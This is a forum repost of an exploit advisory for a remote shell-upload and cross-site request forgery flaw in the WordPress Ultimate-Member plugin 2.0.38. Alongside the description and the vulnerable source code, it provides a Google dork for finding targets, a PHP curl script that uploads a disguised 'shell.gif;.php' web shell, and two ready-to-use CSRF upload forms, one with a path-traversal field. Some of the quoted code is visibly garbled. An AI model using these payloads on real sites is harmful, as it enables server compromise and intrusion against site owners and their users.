WordPress Ultimate-Member 2.0.38 Cross Site Request Forgery / Shell Upload

#160
Topic created · 1 Posts · 2 Views
  • WordPress Ultimate-Member plugin version 2.0.38 suffers from cross site request forgery and remote shell upload vulnerabilities.
    MD5 | f61b91a24dc98849236a6c36c3e9540e
    Download

    ####################################################################  
    # Exploit Title : WordPress Ultimate-Member Plugins 2.0.38 CSRF Shell Upload  
    # Author [ Discovered By ] : KingSkrupellos  
    # Team : Cyberizm Digital Security Army  
    # Date : 05/02/2019  
    # Vendor Homepage : ultimatemember.com  
    # Software Download Link : downloads.wordpress.org/plugin/ultimate-member.2.0.38.zip  
    # Software Information Links : wordpress.org/plugins/ultimate-member/  
    # Software Vulnerable Source Codes :  
    github.com/wp-plugins/ultimate-member/blob/master/core/lib/upload/um-file-upload.php  
    github.com/wp-plugins/ultimate-member/blob/master/core/lib/upload/um-image-upload.php  
    # Software Version : 1.3.21 and 2.0.38 - other previous versions.  
    # Tested On : Windows and Linux  
    # Category : WebApps  
    # Exploit Risk : Medium  
    # Google Dorks : inurl:''/wp-content/plugins/ultimate-member/''  
    # Vulnerability Type : CWE-434 [ Unrestricted Upload of File with Dangerous Type ]  
    CWE-264 [ Permissions, Privileges, and Access Controls ]  
    # PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
    # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
    # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
    ####################################################################  
    # Description about Software :  
    ***************************  
    Ultimate Member is the #1 user profile & membership plugin for WordPress.   
    The plugin makes it a breeze for users to sign-up and become members of your website.   
    The plugin allows you to add beautiful user profiles to your site and is perfect  
    for creating advanced online communities and membership sites.  
    Lightweight and highly extendible, Ultimate Member will enable you to create almost   
    any type of site where users can join and become members with absolute ease.  
    ####################################################################  
    # Impact :  
    ***********  
    * The software allows the attacker to upload or transfer files of dangerous types   
    that can be automatically processed within the product's environment.  
    * This software WordPress Ultimate-Member Plugins  is prone to a vulnerability   
    that lets attackers upload arbitrary files and shell because it fails to adequately sanitize user-supplied input.   
    An attacker can exploit this vulnerability to upload arbitrary code and execute   
    it in the context of the webserver process.   
    This may facilitate unauthorized access or privilege escalation; other attacks are also possible.  
    Attackers can exploit this issue through a browser.   
    System Compromise - Remote attackers can gain control of vulnerable systems.  
    ####################################################################  
    # Remote File Upload/Shell Upload Exploit :  
    ***************************************  
    /wp-content/plugins/ultimate-member/core/lib/upload/um-image-upload.php  
    # Directory File Path :  
    *******************  
    /wp-content/uploads/ultimatemember/temp/.....  
    /wp-content/uploads/.....  
    ####################################################################  
    # Vulnerability Error :  
    *******************   
    {"error":"A theme or plugin compatibility issue"}  
    # Vulnerable Source Code => [ um-image-upload.php ]  
    ************************  
    <?php  
    $i = 0;  
    $dirname = dirname( __FILE__ );  
    do {  
    $dirname = dirname( $dirname );  
    $wp_load = "{$dirname}/wp-load.php";  
    }  
    while( ++$i < 10 && !file_exists( $wp_load ) );  
    require_once( $wp_load );  
    global $ultimatemember;  
    $id = $_POST['key'];  
    $ultimatemember

    fields

    set_id = $_POST['set_id']; $ultimatemember

    fields

    set_mode = $_POST['set_mode']; $ret['error'] = null; $ret = array(); if(isset($_FILES[$id]['name'])) { if(!is_array($_FILES[$id]['name'])) { $temp = $_FILES[$id]["tmp_name"]; $file = $_FILES[$id]["name"]; $file = sanitize_file_name($file); $error = $ultimatemember

    files

    check_image_upload( $temp, $id ); if ( $error ){ $ret['error'] = $error; } else { $ret[] = $ultimatemember

    files

    new_image_upload_temp( $temp, $file, um_get_option('image_compression') ); } } } else { $ret['error'] = __('A theme or plugin compatibility issue','ultimatemember'); } echo json_encode($ret); #################################################################### # Vulnerable Source Code => [ um-file-upload.php ] *************************** <?php $i = 0; $dirname = dirname( __FILE__ ); do { $dirname = dirname( $dirname ); $wp_load = "{$dirname}/wp-load.php"; } while( ++$i < 10 && !file_exists( $wp_load ) ); require_once( $wp_load ); global $ultimatemember; $id = $_POST['key']; $ultimatemember

    fields

    set_id = $_POST['set_id']; $ultimatemember

    fields

    set_mode = $_POST['set_mode']; $ret['error'] = null; $ret = array(); if(isset($_FILES[$id]['name'])) { if(!is_array($_FILES[$id]['name'])) { $temp = $_FILES[$id]["tmp_name"]; $file = $_FILES[$id]["name"]; $file = sanitize_file_name($file); $extension = pathinfo($file, PATHINFO_EXTENSION); $error = $ultimatemember

    files

    check_file_upload( $temp, $extension, $id ); if ( $error ){ $ret['error'] = $error; } else { $ret[] = $ultimatemember

    files

    new_file_upload_temp( $temp, $file ); $ret['icon'] = $ultimatemember

    files

    get_fonticon_by_ext( $extension ); $ret['icon_bg'] = $ultimatemember

    files

    get_fonticon_bg_by_ext( $extension ); $ret['filename'] = $file; } } } else { $ret['error'] = __('A theme or plugin compatibility issue','ultimatemember'); } echo json_encode($ret); #################################################################### # Solution : ****************** Temporary solution to this is to disable the image upload functionality, which can be done by adding the following lines $ret['error'] = __('Functionality disabled'); exit(json_encode($ret)); directly below the line function ajax_image_upload() { in the file /includes/core/class-files.php #################################################################### # PHP Exploiter => ******************** <?php $uploadfile="shell.gif;.php"; $ch = curl_init("http://VULNERABLESITEHERE.gov/wp-content/plugins/ultimate-member/core/lib/upload/um-image-upload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile",'folder'=>'/wp-content/uploads/ultimatemember/temp/')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> #################################################################### # CSRF Cross Site Request Forgery Exploiter 1 : ****************************************** <form enctype="multipart/form-data" action="http://VULNERABLESITEHERE.gov/wp-content/plugins/ultimate-member/core/lib/upload/um-image-upload.php" method="post"> Your File: <input name="uploadfile" type="file" /><br /> <input type="hidden" name="dir_icons" value="../../../../"> <input type="submit" value="upload" /> </form> #################################################################### # CSRF Cross Site Request Forgery Exploiter 2 : ****************************************** <html> <body> <form enctype="multipart/form-data" action="VULNERABLESITEHERE.gov/wp-content/plugins/ultimate-member/core/lib/upload/um-file-upload.php" method="post"> Your File: <input name="files[]" type="file" /><br /> <input type="submit" value="Successfull!" /> </form> </body> </html> #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################

    Source: packetstormsecurity.com

Log in to reply